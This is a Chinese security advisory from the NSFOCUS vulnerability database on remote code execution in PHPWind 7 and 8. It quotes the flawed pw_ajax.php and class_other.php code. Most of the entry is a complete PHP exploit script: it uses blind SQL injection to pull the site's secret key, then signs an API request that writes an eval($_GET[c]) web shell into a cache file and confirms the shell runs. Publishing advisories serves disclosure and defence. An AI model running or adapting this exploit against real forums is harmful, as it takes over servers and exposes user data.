绿盟科技NSFOCUS安全漏洞系统

安全研究

安全漏洞

phpwind pw_ajax.php和class_other.php页面远程代码执行漏洞

发布日期：2010-09-05
更新日期：2010-09-06

受影响系统：

PHPWind PHPWind 8
PHPWind PHPWind 7

描述：

PHPWind是一款国内比较流行的基于PHP的Web论坛程序。

phpwind没有正确地过滤提交给pw_ajax.php页面的输出参数：

} elseif ($action == 'pcdelimg') {

    InitGP(array('fieldname','pctype'));

    InitGP(array('tid','id'),2);

    if (!$tid || !$id || !$fieldname || !$pctype) {

        echo 'fail';

    }

    $id = (int)$id;

    if ($pctype == 'topic') {

        $tablename = GetTopcitable($id);

    } elseif ($pctype == 'postcate') {

        $tablename = GetPcatetable($id);

    }

    $path = $db->get_value("SELECT $fieldname FROM $tablename WHERE tid=". pwEscape($tid));

fieldname未经任何有效的过滤，利用该注射可以获取任何数据库里的数据。

另外class_other.php中存在一个任意命令执行的漏洞：

function threadscateGory($classdb) {//生成帖子交换分类



        $classcache = "<?php\r\n\$info_class=array(\r\n";

        foreach ($classdb as $key => $class) {

            !$class['ifshow'] && $class['ifshow'] = '0';

            $flag && $info_class[$class['cid']]['ifshow'] && $class['ifshow'] = '1';

            $class['name'] = str_replace(array('"',"'"),array(""","'"),$class['name']);

            $classcache .= "'$class[cid]'=>".pw_var_export($class).",\r\n\r\n";

        }

        $classcache .= ");\r\n?>";

        writeover(D_P."data/bbscache/info_class.php",$classcache);

    }

$class[cid]未经过滤。进入此逻辑需要一些较为关键的key，借助上面的注射漏洞即可获得该key。

<*来源：结界师

  链接：http://www.wooyun.org/bug.php?action=view&id=417
*>

测试方法：

警告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

<?php

echo "

Info: Poc for Phpwind远程命令执行

Test: exploit.php user password http://www.wooyun.org/phpwind/

";

if($argc<3){

    echo "\r\n参数缺少\r\n";

    die();

}

$user=$argv[1];

$pass=$argv[2];

$pwurl=$argv[3];

$myheader=array(

        'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',

        'Accept-Language: zh-cn,zh;q=0.5',

        'Accept-Charset: gb2312,utf-8;q=0.7,*;q=0.7',

        'Content-Type: application/x-www-form-urlencoded; charset=UTF-8',

        'Referer: http://www.wooyun.org/',

        'Connection: Keep-Alive',

        'Cache-Control: no-cache',

        'User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; InfoPath.2)'

    );

$cookie="";

$str=curlsend("$pwurl/login.php?","POST",0,$myheader,"forward=&jumpurl=http%3A%2F%2F127.0.0.1%2FPHPWind/upload%2F&step=2&lgt=0&pwuser=$user&pwpwd=$pass&hideid=0&cktime=31536000&submit=%B5%C7%C2%BC",1);

preg_match_all("/Set-Cookie:([^;]+)/is",$str,$array);

for($i=0;$i<count($array[1]);$i++){

    $cookie=$cookie.";".$array[1][$i];

}

//echo $cookie;

$test = curlsend('$pwurl/pw_ajax.php',"POST",0,$myheader,'',1);

if(strpos($test,'<ajax>')) {

    die('用户密码或者其他参数错误');

}

$shellcode="action=pcdelimg&fieldname=db_value%20from%20pw_config%20where%20db_name%20like%200x64625f736974656f776e65726964%20and%20db_value%20like%200x{offset}25%20union%20select%200x612e2e;%23";

$hash="0123456789abcdef";

$craked="";

for($i=0;$i<32;$i++){

    for($n=0;$n<16;$n++){

        $tmp=str_replace("{offset}",bin2hex($craked.$hash[$n]),$shellcode);

        $tmp=curlsend("$pwurl/pw_ajax.php","POST",0,$myheader,$tmp,0);

        if(strpos($tmp,"pw_config")){

            echo "CrackEd Offset ".($i+1)." :".$hash[$n]."\r\n";

            $craked=$craked.$hash[$n];

            break;

        }

    }

}

echo "Craked Magicdata :".$craked."\r\n";

echo "Get shell :";

//another 0day

$arg='';

$hack = array();

$hack['mode'] = 'Other';

$hack['method'] = 'threadscateGory';

$hack['params'] = 'a:1:{s:3:"cid";a:1:{s:3:"cid";a:1:{s:3:"cid";s:21:"\'.eval($_GET[c]).\'abc";}}}';

$hack['type'] = 'app';

$hack = strips($hack);

ksort($hack);

reset($hack);

foreach ($hack as $key => $value) {

    if ($value && $key != 'sig') {

        $arg .= "$key=$value&";

    }

}

$arg.='sig='.md5($arg.$craked);

echo file_get_contents("$pwurl/pw_api.php?".$arg);

echo "OK\r\n";

$str=file_get_contents("$pwurl/data/bbscache/info_class.php?c=echo%20Just_wooyun;");

if(strpos($str,'wooyun')){

    echo "Got shell :"."$pwurl/data/bbscache/info_class.php?c=phpinfo();";

    echo "\r\nOver!";

}

function strips($param) {

    if (is_array($param)) {

        foreach ($param as $key => $value) {

            $param[$key] = strips($value);

        }

    } else {

        $param = stripslashes($param);

    }

    return $param;

}

function curlsend($url,$method=false,$ssl=0,$myheader,$data='',$header=0){

global $cookie;

$ch = curl_init();

$timeout = 0; // set to zero for no timeout

curl_setopt ($ch, CURLOPT_URL, $url);

curl_setopt ($ch, CURLOPT_POST, $method);

curl_setopt($ch,CURLOPT_HTTPHEADER,$myheader);

curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);

curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);

curl_setopt ($ch, CURLOPT_COOKIE, $cookie);

if($data){

curl_setopt ($ch, CURLOPT_POSTFIELDS,$data);

}

curl_setopt ($ch, CURLOPT_HEADER, $header);

if($ssl){

    curl_setopt($ch,  CURLOPT_SSL_VERIFYPEER,  FALSE);

}

$handles = curl_exec($ch);

curl_close($ch);

//echo $handles;

return $handles;

}

建议：

厂商补丁：

PHPWind
-------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.phpwind.net/

浏览次数：5710
严重程度：0（网友投票）

关于我们: 公司介绍; 公司荣誉; 公司新闻

联系我们: 公司总部; 分支机构; 海外机构

快速链接: 绿盟云; 绿盟威胁情报中心NTI; 技术博客